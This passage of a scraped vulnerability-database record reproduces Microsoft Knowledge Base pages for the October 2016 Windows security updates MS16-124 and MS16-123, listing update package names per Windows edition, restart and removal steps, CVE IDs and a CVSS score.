Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x64.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3185330-x64.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall </span>setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 3192391</a><br/>See <a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 3185330</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3192391-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3185330-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3192391-ia64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3185330-ia64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-27\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 3192391</a><br/>See <a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-29\" target=\"_self\">Microsoft Knowledge Base Article 3185330</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 8.1 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3192392-x86.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3185331-x86.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3192392-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3185331-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-30\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192392\" id=\"kb-link-31\" target=\"_self\">Microsoft Knowledge Base Article 3192392</a><br/>See <a href=\"https://support.microsoft.com/help/3185331\" id=\"kb-link-32\" target=\"_self\">Microsoft Knowledge Base Article 3185331</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3192393-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3185332-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3192392-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3185331-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-33\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192393\" id=\"kb-link-34\" target=\"_self\">Microsoft Knowledge Base Article 3192393</a><br/>See <a href=\"https://support.microsoft.com/help/3185332\" id=\"kb-link-35\" target=\"_self\">Microsoft Knowledge Base Article 3185332</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows RT 8.1 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">The 3192392 Security Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-36\" target=\"_self\">Windows Update</a> only. <br/>The 3185331 Monthly Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-37\" target=\"_self\">Windows Update</a> only. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192393\" id=\"kb-link-38\" target=\"_self\">Microsoft Knowledge Base Article 3192393</a><br/>See <a href=\"https://support.microsoft.com/help/3185332\" id=\"kb-link-39\" target=\"_self\">Microsoft Knowledge Base Article 3185332</a></td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 10 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-</span><span class=\"text-base\">KB3192440</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3192441-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-</span><span class=\"text-base\">KB3192441</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x64.ms</span><span class=\"text-base\">u</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-40\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-41\" target=\"_self\">Microsoft Knowledge Base Article 3192440</a><br/>See <a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-42\" target=\"_self\">Microsoft Knowledge Base Article 3192441</a><br/>See <a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-43\" target=\"_self\">Microsoft Knowledge Base Article 3194798</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-44\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-45\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-46\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-47\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 3, "modified": "2016-10-11T15:29:52", "id": "KB3193227", "href": "https://support.microsoft.com/en-us/help/3193227/", "published": "2016-10-11T00:00:00", "title": "MS16-124: Security update for Windows registry: October 11, 2016", "type": "mskb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T22:46:28", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-7191", "CVE-2016-3341", "CVE-2016-3376", "CVE-2016-3266", "CVE-2016-7185"], "description": "<html><body><p>Resolves a vulnerability in Windows that could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-123\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-123</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><br/><br/><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates.</li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.<br/></li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3192892\" id=\"kb-link-6\" target=\"_self\">3192892</a> MS16-123: Description of the security update for kernel-mode drivers: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3191203\" id=\"kb-link-7\" target=\"_self\">3191203</a> MS16-120 and MS16-123: Description of the security update for kernel-mode drivers: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192392\" id=\"kb-link-8\" target=\"_self\">3192392</a> October 2016 security only quality update for Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3185331\" id=\"kb-link-9\" target=\"_self\">3185331</a> October 2016 security monthly quality rollup for Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3192393\" id=\"kb-link-10\" target=\"_self\">3192393</a> October 2016 security only quality update for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3185332\" id=\"kb-link-11\" target=\"_self\">3185332</a> October 2016 security monthly quality rollup for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-12\" target=\"_self\">3192391</a> October 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-13\" target=\"_self\">3185330</a> October 2016 security monthly quality rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-14\" target=\"_self\">3192440</a> Cumulative update for Windows 10: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-15\" target=\"_self\">3194798</a> Cumulative update for Windows 10 Version 1607 and Windows Server 2016: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-16\" target=\"_self\">3192441</a> Cumulative update for Windows 10 Version 1511: October 11, 2016</li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><a class=\"bookmark\" id=\"obtaintheupdate\"></a><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see<br/><a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-18\" target=\"_self\">Get security updates automatically</a>.<br/><br/><span class=\"text-base\">Note</span> For Windows RT 8.1, this update is available through Windows Update only.<br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=3192892\" id=\"kb-link-19\" target=\"_self\">Microsoft Update Catalog</a> website.</div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Method 3: Microsoft Download Center</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">You can obtain the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<br/><br/>Click the download link in <a href=\"https://technet.microsoft.com/library/security/ms16-123\" id=\"kb-link-20\" target=\"_self\">Microsoft Security Bulletin MS16-123</a> that corresponds to the version of Windows that you are running.<br/></div><br/></span></div></div></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information<br/></span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><br/><br/><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3191203-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3191203-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3191203\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 3191203</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3191203-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3191203-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3191203-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3191203\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 3191203</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 7 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x86.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7<br/><span class=\"text-base\">Windows6.1-KB3185330-x86.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3185330-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall </span>setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 3192391</a><br/>See <a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-27\" target=\"_self\">Microsoft Knowledge Base Article 3185330</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3192391-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3185330-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3192391-ia64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3185330-ia64.msu<br/></span>Monthly Rrllup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 